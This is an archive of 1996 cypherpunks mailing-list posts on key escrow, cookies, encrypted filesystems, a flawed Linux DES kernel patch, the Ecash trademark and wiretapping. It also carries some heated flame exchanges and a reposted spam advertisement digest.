At 11:57 AM 7/16/96 -0400, Clay Olbon II wrote:

>Now my $.02.  I am concerned about the lack of a distinction between
>transient communications and stored data.  This is apparent in the GAK
>proposals, but is also increasingly apparent in mainstream corporate
>products such as this one and ViaCrypt BE.  It is apparent (to me anyway)
>that corporate access to stored data (data owned by the company, on
>machines owned by the company) is probably necessary.  I do not see this
>same need for access to transient communications.  Am I way off base on
>this one?


This has been mentioned a number of times by various people.  It should be 
obvious that it is pointless to escrow the key of a data stream that you are 
not recording, such as a telephone conversation.  Also, if you have no 
permanent need for that data (also, the telephone conversation) it is 
unnecessary.  As might be expected, however, the proponents of GAK don't 
distinguish between keys for storage and keys for communication.  

Such an oversight is predictable.  It's likely that governments will  be more 
interested in keys for communication, because the data is far more easily 
(and secretly) accessible.  Were they to admit that nobody has a need for 
his own communication data key, they'd lose a substantial fraction of their 
target data.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 18 Jul 1996 02:45:52 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Washington Post -- "Block but Verify"
In-Reply-To: <v01510103ae1062fbecc1@[204.62.128.229]>
Message-ID: <Pine.BSF.3.91.960716172533.5147A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 15 Jul 1996, Declan McCullagh wrote:

> [An editorial in today's Washington Post, about blocking software and the
> CyberWire Dispatch that Brock and I sent out earlier this month. --Declan]
> 
> http://www.washingtonpost.com/wp-srv/WPlate/1996-07/15/006L-071596-idx.html
> 
> Editorial: "BLOCK, BUT VERIFY"
> 
> Monday, July 15 1996; Page A18
> The Washington Post
> 
> 
<SNIP>
>    read. One pitfall, though, as Messrs. McCullough and Meeks observe, is
>    the commercially inspired reluctance of many of these producers of
>    software to specify exactly what they are blocking. Though

A user-selectable menu would be, umm, interesting ... just how could one 
describe, in terms offensive to absolutely no one, what one's product is 
offering to block?

-r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 18 Jul 1996 03:04:39 +0800
To: Christopher Hull <nozefngr@apple.com>
Subject: Re: CookieScan 0.0 rev 0
In-Reply-To: <199607160116.SAA24413@apple.com>
Message-ID: <Pine.BSF.3.91.960716173425.5147B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




> >Christopher Hull wrote:
> >> What I imagine is a little utility that would
> >> display the cookies stashed on a machine and
> >> give the user the option to either delete or
> >> <snicker> edit </snicker> any given cookie.
> >> (Hey, it¹s *your* computer, not the website¹s).
> >
> >  I doubt that you will have much luck here.  Many (most??) sites
> >that use cookies tend to encode or obscure them so that they are not
> >human readable.  Certainly anyone doing something questionable
> >will obscure their cookies so that they will not be user readable
> >or editable.
> >
> I agree.  Editing is problematic.
> 

Yes, editing is difficult, often a trial-and-error effort if you don't 
know what the site is looking for. You generally end up with a cookie 
that is ignored by the server, which then acts as though no cookie were 
involved.

I have yet to see a "damaging" cookie, outside of the stupidity of trying 
to pass a plain-text password across the 'net for storage on the client. 
Anybody seen any interesting problematic cookies?

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Thu, 18 Jul 1996 17:04:35 +0800
To: "cypherpunks" <jti@i-manila.com.ph>
Subject: Re: Stuffs used for detection
Message-ID: <199607180553.WAA12039@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Jul 96 06:32:40 -0800, jti@i-manila.com.ph wrote:

>
>In our school library, there is a depository area wherein you deposit your things and get the tag. >Since the library doesn't allow those tags to be brought out from the library, everytime you >brought it out and pass by the door, it will alarm. Does anyone know what stuff is that? How come >it is alarmed? I brought some metals but it wouldn't alarm... Why those tag would alarm them???

Usually they're magnetic...


// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 18 Jul 1996 12:26:18 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <v02120d03ae10e4a442cf@[192.0.2.1]>
Message-ID: <Pine.SV4.3.91.960716174015.11855B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jul 1996, Lucky Green wrote:

> How do you get a hold of the phone number if you don't know the location of
> the company, they aren't on the net, and don't have the US phone numbers
> CD-ROM handy? I am 33 and have yet to figure this one out...

   Look in a trade directory?  Call the advertising manager of the
publication that ran the ad?   Call the office of the relevant trade 
association?

Gosh, are these radical concepts for you?   Am I to understand that there 
has arisen a generation of cypherpunks which can't sniff out any 
information which a Net Search Robot doesn't return?

Go back to your couch, potato.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 10:55:44 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <ae10a39c010210045882@[205.199.118.202]>
Message-ID: <v03007600ae11f2265179@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 PM -0700 7/16/96, Rich Graves wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Tue, 16 Jul 1996, Timothy C. May wrote:
>
>> There were some flames, which I mostly ignored. Also, a peculiar kind of
>> flame war dealt with endless speculations about his "motives." Utter
>> nonsense, from careful reading of his views. That is, to insinuate that he
>> is an agent of the NSA or the Bilderberger Grand Conspiracy merely because
>> he (then) argued that Clipper was not as bad as most of us thought it
>> was...well, that's just nonsensical.
>
>But he's still a fucking statist.

Thanks for letting people know that at my advanced age my sexual prowess is
undimmed. That kind of advertising cannot be bought.

You sound authoritative on this matter. Have we some women in common I
don't know about? It's SO hard to keep track. :-)

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 18 Jul 1996 12:32:10 +0800
To: cypherpunks@toad.com
Subject: It's no "WON_der"
Message-ID: <199607162314.TAA25841@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Jul 96 at 1:08, John Young wrote:

>    6-15-96. NYP, Book review: 
>  
>       AFTER THOUGHT 
>       The Computer Challenge to Human Intelligence 
>       By James Bailey 
>       Illustrated. 277 pages Basic Books/HarperCollins. $25. 
>       ISBN 0-465-00781-3 

>    Mr. Bailey, a former senior manager at the Thinking 
>    Machines Corporation, foresees an "electronic computing 
>    revolution" whose "intellectual impact will be greater than 
>    anything since the Renaissance, possibly greater than 
>    anything since the invention of language." In his view, the 
>    greatest challenge posed by the computer revolution will be 
>    for humans to trust processes of thinking they won't 
>    necessarily understand, such as neural networks spotting 
>    patterns without supplying proof "in any human-absorbable 
>    form." 

Of course it's important to note that all models of computing 
(serial, neural,  etc.) are based somewhat on conceptions of how 
humans think, compute, etc.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 18 Jul 1996 12:20:50 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Opiated file systems
In-Reply-To: <199607161705.NAA19009@unix.asb.com>
Message-ID: <Pine.LNX.3.94.960716191903.181A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Jul 1996, Deranged Mutant wrote:

> A problem with a c'punk-style encrypted fs with source code and wide 
> distribution is, of course, that attackers will KNOW that there is a 
> duress key.

I don't see how this would effect the security of such a filesystem.  There
is absolutely nothing that an attacker can do to get the real key.  An attacker
would just ignore all computers that have duress key capability.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMewkJLZc+sv5siulAQEXVwP/Rs78lEERnz2HdtMAwnuSgwM7Bb1UZhTq
WWF439dp0NdyVRNw9HvV4vzX+HuES2sXZ2IIugsm7pCOQoUW6aAbY0AnPQ/38yt4
HbtwtWSH4BI9Fc/by7UXEwYY2rKmQYZw80ZPcsunNFNG19+PanjOlEulHZAH/3Q7
8wF1J7WO4WU=
=Jkfn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 18 Jul 1996 03:11:23 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: DES & IDEA built right into the Linux kernel...
In-Reply-To: <4se8do$dlp@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.94.960716192252.5644C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 15 Jul 1996, Ian Goldberg wrote:

> Date: 15 Jul 1996 13:07:20 -0700
> From: Ian Goldberg <iang@cs.berkeley.edu>
> To: cypherpunks@toad.com
> Newsgroups: isaac.lists.cypherpunks
> Subject: Re: DES & IDEA built right into the Linux kernel...
> 
> In article <199607130507.WAA25103@myriad>,
> Anonymous <nobody@mockingbird.alias.net> wrote:
> >> Nicholas Leon <nicholas@binary9.net> has created tools that allow DES
> >> and IDEA encryption at the device level for the Linux kernel.  Some of
> >> the patches are in the 2.0.4 kernel, and the rest can be found at
> >>
> >>     http://www.binary9.net/nicholas/linuxkernel/patches/
> >
> >
> >Yep, you can mount encrypted files or partitions as filesystems. (sorta
> >like securedrive/securedevice for messydos.)  Nifty stuff...
> 
> Except that last I checked (2.0.6) it was completely insecure.  The
> DES-encrypted filesystem ignored your password and always used a key of
> all 0's (which is a weak key in DES, to boot).  I've been touching it up
> to do DES and IDEA _right_ (CBC mode within each block, IV based on block
> number), and plan to put in some simple stego as well.
> 
>    - Ian

Hrmm.. Sounds interesting... how long till your patch is done?

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMevscDAJap8fyDMVAQE4Dgf8DMS7BeiCQQvbzsF1d1egJPzv1TPW3y+J
Sy8LglsqPxkYs4NynN6xwtWupKrkDUb5J5GjzkzOVD85NTlCxHxufiU5zi2u3lWV
/+a6sybvIKR+MikogveQFqQqZTngFeIJBnAUdPIfybQz2gubGGdEJW0zv7eDvFlX
GnWDkYpRcZbq3MiF188oRAjrSOUhJn2htFYkRaYLvuKwASaki4yfMShqMA4BYclx
etxpj2lIXeJQJuF1iGyNKjGGWKaPhZYXRHT+rThufYczsUHdjb1kzdJ+dbfhAi7H
OY204pjv/FhZ/ny3KFK5cqP38vXQex76IO16v7mrttmRpmbOCT9stg==
=BliQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 18 Jul 1996 11:18:50 +0800
To: cypherpunks@toad.com
Subject: Code used by George Washington made available at last
Message-ID: <199607170239.TAA20450@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


There's an AP article by Carl Hartman saying that historians now have
access to a secret handwritten code used by George Washington and
Marquis de Lafayette.  (It's a newspaper article that somebody
across the train is reading; looks like today's SF Examiner...)

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Econo Ads" <Econo.Ads@sweden.it.earthlink.net>
Date: Thu, 18 Jul 1996 15:28:28 +0800
To: econoads@sweden.it.earthlink.net
Subject: Econo Ads  7/16
Message-ID: <199607172008.QAA10142@sweden.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


ECONO ADS & MORE!
July 16th, 1996
____________________

We stand for Freedom of the Press,  Freedom of Speech, and
the Free Enterprise System that made America Great !!

___________________

REMOVAL:  If you wish to receive no further mail from us,
we understand.  Just press "reply" and type the word
      remove          in the  subject or message area.  No
other words are necessary.   This is an automated
system and any other words or messages will only delay
your being removed.

___________________

PRESIDENTIAL ELECTION POLL:  In our next issue, you
will be able to participate in the Internets Largest Election
Poll.  Be a part of Internet History!  

___________________

To respond to any of these messages,  DO NOT HIT REPLY!
Rather,  create a New E-Mail for each response and 
address it to the E-Mail address provided in the message you
are responding to.

_________________

 -- Americans for Constitutional Action  -- 
Invite you to join  the drive to repeal the Federal Income Tax 
(&.the IRS), and replace it with a National Retail Sales Tax.
Imagine -TAKE HOME YOUR ENTIRE PAY CHECK -- 
and spend it on whatever you want!   Like  to help with the
petition drive?     You can!      Two Bills have already been
introduced in the U.S House of Representatives to eliminate the
federal income tax!  Learn how to help in this historic effort.
This is not some crackpot "tax rebellion" scheme, but rather
a serious effort to restore sanity to our Federal Government.
Respond now to learn all the facts, free!   See our Home Page at
http://www.webbuild.com/~acanc/index.htm .     Or,
E-Mail:      acanc@nando.net      for complete details.

_______________________

If you sell advertising for a living, LOVE GOLF, and want to 
own your own business, we have a unique opportunity.  
Call 1-203-521-9466 and we'll send you the most amazing 
Yardage Book you've ever seen - and information.

____________________

GOLFERS - ENTREPRENEURS - Great opportunity to be 
part of the fast growing golf industry world.  Manufacturing
facility opening off shore plant for golf bags, etc.  Looking 
for investors.  Profit. Sponsors and involvement.  Interested
parties - contact W.L. Rose.   E-Mail  kenford@aol.com or
fax   1-714-476-0190 

_____________________

"FREE HOME BASE BUSINESS"  For FREE information send
#10 SASE to : HOME BASE, 2042 Craft Ln. , Sarasota Fl. 34239

_____________________

NEW TRAVEL WEB SITE

The Traveler Savings SiteO helps you stretch your travel 
budget.  Continually updated travel savings tips, articles
and resources complement a guide to businesses offering
discounts to travelers.

http://home.sprynet.com/sprynet/inetmktg/

____________________

ARCHERY SUPPLIES  via the Internet.  Bows, arrows, and accessories
shipped directly to you.  Free Bow tuning info.  For complete
information,  PRESS REPLY and type the word    ARCHERY

____________________

PLEASE PARDON MY INTRUSION ...

... but did you know, that within 30-60 days,
you could be making $300 - $600 per day with your fax??
It's Simple!  Let me show you how ...
For FREE details, send E-Mail to:  teammark@pin-point.com

____________________

     IT'S PARTY TIME!!!
Voice Personals Dateline.  Single Guys and Ladies are waiting
to meet you!  Respond to create your own personal message.
Local Areas - 1-900-835-5182  ext. 9200.  18+ $2.95 / min.
Profit  Systems,  612-776-8557

_______________________

ATTENTION CRUISE LOVERS!   If you love Cruise Vacations, you need to
subscribe to Cruise News.  It's FREE.  This E-Mail newsletter will
come to you mailbox twice monthly.  You will read the latest news from
the Cruise Industry,  special insider deals,  reader contests  (win a
prize!),  funny stories, and more.  To subscribe, send an E-Mail to:
CruiseNews@American-Dream.com 

______________

ATTENTION GOLF LOVERS:  Subscribe to Golfers E-Mail Express!
It will come to your mailbox twice a month, with exciting new 
products and services &  unusual offers for Golfers Only!  It's FREE!
To subscribe, send an E-Mail to:   Golf@American-Dream.com
______________

STAY HOME AND MAKE $100 A DAY!  Great new source-book  of
100's of Work at Home ideas.  For complete details,  send an E-Mail
to: Homework@American-Dream.com

_______________________


ATTENTION ADVERTISERS:  To receive information about advertising in a
future issue of ECONO ADS,  press REPLY and type the word:    adinfo  
  in the  subject or message area.   That's all you need to say.  We
will E-Mail complete details to you.

______________________

ECONO ADS

This was mailed to List C  on July 15th, 1996

______________________

"We mutually pledge to each other our lives, our fortunes,
and our sacred honor."

--  Thomas Jefferson,  The Delclaration of Independence
July 4th, 1776


"It is impossible to travel faster than the speed of light, and 
certainly not desireable, as ones hat keeps blowing off!"

--Woody Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 18 Jul 1996 03:02:35 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Why <jf_avon@citenet.net> was blocked.
In-Reply-To: <9607160301.AB00207@cti02.citenet.net>
Message-ID: <Pine.LNX.3.94.960716194159.5644F-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 15 Jul 1996, Jean-Francois Avon wrote:

> Date: Mon, 15 Jul 1996 22:57:13 -0500
> From: Jean-Francois Avon <jf_avon@citenet.net>
> To: cypherpunks@toad.com
> Cc: Anonymous Remail Service <nobody@vegas.gateway.com>
> Subject: Re: Why <jf_avon@citenet.net> was blocked.
> 
> On 15 Jul 96 at 21:28, Anonymous Remail Service wrote:
> 
> > >On 13 Jul 96 at 22:22, root@mail.demon.net wrote:
> > >
> > >Could you please explain me why my message was blocked?
> >
> > Because you're an asshole? Why in the world would you ask the
> > entire fucking cypherpunks list, instead of just
> > root@mail.demon.net, to "please explain me[SIC] why my message was
> > blocked?" You are constantly harassing, so you were blocked. Deal
> > with it. me
> 
> Dear flamer,
> 
> Obviously, you did not learn to read.  Go back to school.
> 
> I asked the root@mail.demon.net to explain why I was blocked and I
> asked CPunks to reply to the post "below", which was my original
> question.
> 
> 
> What I asked on the CPunks list was the following:
> 
> Is the fact that a realdeal.exe /per (wiped with zeroes)  processed
> drive weakens the idea encryption of a Secure Drive 1.4a'ed drive?
> 

Umm.. when telling other ppl that they do not know how to read, it might
be usefull to use sentances with a subject AND a predicate.  I know that
this is something they taught you _way_ back in second grade, but you
should still remember it.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMevw/TAJap8fyDMVAQEQVAf9ErBTDfiYcc3WguJnN3pJcfiqbiBZqsze
yAZ9D++UaD5unz7Odf0jR6wJqsC20uHHP5h61eH/2UaUbY+x2j1aBxnndq8aXyou
eDYlfappL3C81gn3NMrBsFGWONMohvipywmuFWuvUDou9vKs+wBJcECZk4FcWsnY
XXOoEtjc5w/H9lnQQBfdOpFbTqxHYfrl8yE4KrqMh+zbwJ8ebdm+YZ8nPMFmoW99
nBsOfbAAoVC2tKBxm1QcSEocR1y91Kphgrm92Vca05DIZcmt+yFnWLr6PLjvWhBc
82pWxlPgldMdX/ItIjzGIaZO7YzI1OnnRGPIU+79pseDBBCGqSJRVg==
=cmSa
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 18 Jul 1996 17:22:09 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
Message-ID: <v02120d0eae120296b704@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:11 7/15/96, David Sternlight wrote:
[...]
>Nothing like a good personal defamation before even reading my posts, eh?
>As those who have paid attention know, I post my policy views, not
>flame-bait. The idea that I am deliberately trying to start flame wars is
>pure paranoia.

LOL. ROTF. While the poster of the message to which you are responding may
not have read your posts, I have. Hundreds of them. Your USENET posts
routinely lead to some of the longest flame wars I have ever seen.

While starting flame wars may not be your intention, it most certainly is
often the result of your posts. Consequently, you are one of only two
people in my global USENET kill file. Not because I hate you, but because I
don't enjoy reading the endless flame fests that seem to be the inevitable
result of your posts.

Deliberate or incidental, you *are* starting flame wars.

No offense,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Thu, 18 Jul 1996 18:59:13 +0800
To: cypherpunks@toad.com
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
In-Reply-To: <199607170040.UAA13512@alpha.pair.com>
Message-ID: <m0ugN8o-000HEEC@JATO.hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Tue, 16 Jul 1996 22:48:23 +0200 (MET DST)
>  From: Alex de Joode <usura@replay.com>
>  To: cypherpunks@toad.com
>  Subject: Re: #E-CASH: PRODUCT OR SERVICE?
>  Newsgroups: list.cypherpunks
> 
> [..]
>  : "Ecash" is a registered trademark of DigiCash.  It is registered
>  : with the Benelux trademark office and the United States
>  : trademark office.  I believe that it is considered unwise to use
>  : minor variations on trademarked names, but I'm not an
>  : intellectual property rights lawyer.
>  
>  The Benelux (Netherlands, Belgium and Luxembourg) trademark laws
>  don't allow for slight variations, certainly not if there is a
>  change that people get confused, it is very very likey that the
>  judges of the benelux trademark court will decide that
>  ecash and e-cash are just to simular, and will thus confuse the
>  public. (art 5 lid 1 BMW)
>  
>  btw: I'm surprised DigiCash didn't file for a European Trademark,
>  but opted for Benelux and US protection.

Perhaps this has already been voiced on the main list (I get a filtered
helping or two of cypherpunks), but *I'm* surprised that such a generic name
as 'Ecash' was granted trademark status anywhere.

It's like giving Microsoft a trademark on the term 'Email'...  It's nuts!
Was the term ecash not in use before DigiCash showed up on the scene? 

    Stig
    

    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 18 Jul 1996 11:16:30 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
In-Reply-To: <199607161436.JAA27358@homeport.org>
Message-ID: <v0300760dae11e42f8644@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:26 PM -0400 7/16/96, Jeff Weinstein wrote:
>   We are not doing any type of credit check.  We are doing some address
> verification using local databases, so these queries don't go into
> anyones tracking database.

Ah. <Lucky-mode> So they can find you later when they outlaw crypto?
</Lucky-mode>

;-)

No offense to our dear cypherpunk friends at Netscape, who are certainly
just following orders. But, frankly, I don't feel like sending a sperm
sample to Netscape, this time...

When this goes across the old speed-bump, will someone post the URL here?
Carefully, of course...



Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 18 Jul 1996 17:11:17 +0800
To: "Peter D. Junger" <cypherpunks@toad.com>
Subject: Re: Sternlight on C'punks
Message-ID: <v02120d0fae1205c776bd@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:42 7/16/96, Peter D. Junger wrote:
>How does one set up a kill-file for a mailing list?  I run a Linux box
>with sendmail and use the MH mail system.
>
>My best guess is that I will have to install procmail, but would like
>your advice before going to a lot of labor.

Procmail is the way to go.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 19:21:12 +0800
To: cypherpunks@toad.com
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <ae11ac5006021004e0dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:29 PM 7/16/96, Declan McCullagh wrote:

>(Note that Leahy is only occasionally a friend of the Net. His original
>crypto bill had troubling additional criminal penalties; he shepharded
>Digital Telephony through Congress; he is a co-sponsor of the vile
>copyright bill pending right now. In sum, he'd hurt the Net more than help
>it. This becomes a problem when netizens hold him up as an champion of our
>freedoms -- and then when DT II comes along his fellow senators think it's
>okay to vote for it 'cuz Mr. Net, Leahy, is a cosponsor.)

By the way, I certainly don't hold him up as a champion of views I can
support; I vividly recall his role in the disastrous DT Act.

>My rebuttal to Gorelick's fantasy is: well, what about Japan, where the
>country's constitution forbids wiretapping?

Many countries have constitutions which say fine things, even though the
reality is quite different. Some even constitutions which are in many ways
better than the U.S. version...until of course the reality on the street is
taken into account.

Japan has an active SIGINT capability, called Chobetsu, directed
domestically at U.S. installations (a la NSA's own SIGINT facility at
Misawa AFB) and at domestic companies. Whatever their constitution may say,
intercepts are used. Chip companies with facilities in Japan communicate
with their facilities with the expectation that MITI and Chobetsu are
making all attempts to intercept useful economic intelligence.

Information on the intelligence agencies of various countries may be found
in the standard reference by Jeffery Richelson, or on the Web at such URLs
as http://www.onestep.com/milnet/iagency.htm

Here is one entry for Chobetsu:

Chobetsu   Ground Self-Defense Forces       Investigation              Japan
                      Division,
                      Second Section,
                      Annex Chamber

In short, I don't believe that a New Crypto World Order, with buy-ins
already apparent from most European and Asian countries, will be deterred
by Japan's nominal promise in its constitution not to wiretap.

As a friend of mine who spent the last nine years working for an American
chip company in Tsukuba and Tokyo puts it, "Japan is a fucking police
state."

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 18 Jul 1996 08:51:28 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: killfile with mh Re: S********* on C'punks
In-Reply-To: <199607161842.OAA03412@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199607161911.VAA29746@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu> wrote 
 something like:
>
> How does one set up a kill-file for a mailing list?  I run a Linux box
> with sendmail and use the MH mail system.
> 
> My best guess is that I will have to install procmail, but would like
> your advice before going to a lot of labor.


No, mh is sufficient for all your mail handling needs.


"man slocal" for starters.  For advanced stuff you can always 
write a script that takes messages and chews on them and either 
sends them to rcvstore or to /dev/null.


I think I'll write a script that parses each letter looking for
text from D**** S********* and adds that text to my "D**** 
S********* Travesty Database".  Then it will select random 
sentences from that database and construct long cascade insult-
fests between D**** S********* and himself and mail them to 
cypherpunks via an anonymous remailer.


Just kidding.


I think I'll write a script which globally searches and replaces
"D**** S*********" with "Duncan Frissell" in my cpunks folder.



Just kidding again.


Okay bye.

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMevpSEjbHy8sKZitAQHR1gL/Ye/o58xe7DiApoS2WzPwnHpnj4JfV0Fb
FYxeaFcRaZy98ub3tt6bqrf5dM8Q6G4/sFnofUhdJqe7G1N4awuI7Lab/fIRPmDV
lEMQ2S/ze1tM9Sg0KhjZpezgxfZsN/pX
=KdY+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 18 Jul 1996 10:30:50 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
Message-ID: <199607170444.VAA18087@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Dave:

You are a helluva fine debater but you are also an unbelievably 
irritating, sanctimonious son-of-a-bitch.

A CoWaRD

On Tue, 16 Jul 1996, David Sternlight wrote:

> At 10:54 AM -0700 7/16/96, Vladimir Z. Nuri wrote:
> 
> >a suggestion: get a pseudonym!
> 
> In my opinion (it's not "the truth") using a pseudonym except in force
> majeure circumstances such as a rape counseling group is cowardly. I think
> people should stand behind what they say, and the notion of Detweiler's
> having arguments with himself pseudonymously would be hilarious if it were
> not pathetic.
> 
> In any case it wouldn't work for me since I suspect my literary style is
> sufficiently distinctive (at least for this sort of group) that I'd be
> spotted in a short time and then be the victim of a bunch of nasty "what
> have you got to hide" posts.
> 
> And I'm not going to twist myself into a pretzel, stylistically speaking,
> just so some thug's nastiness can be avoided. I trust the good sense of
> wiser readers, and as Harry Truman said...
> 
> David
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 18 Jul 1996 02:40:37 +0800
To: cypherpunks@toad.com
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <199607162048.WAA07892@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


[..]
: "Ecash" is a registered trademark of DigiCash.  It is registered
: with the Benelux trademark office and the United States
: trademark office.  I believe that it is considered unwise to use
: minor variations on trademarked names, but I'm not an
: intellectual property rights lawyer.

The Benelux (Netherlands, Belgium and Luxembourg) trademark laws
don't allow for slight variations, certainly not if there is a 
change that people get confused, it is very very likey that the
judges of the benelux trademark court will decide that
ecash and e-cash are just to simular, and will thus confuse the
public. (art 5 lid 1 BMW)

btw: I'm surprised DigiCash didn't file for a European Trademark,
but opted for Benelux and US protection.

bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
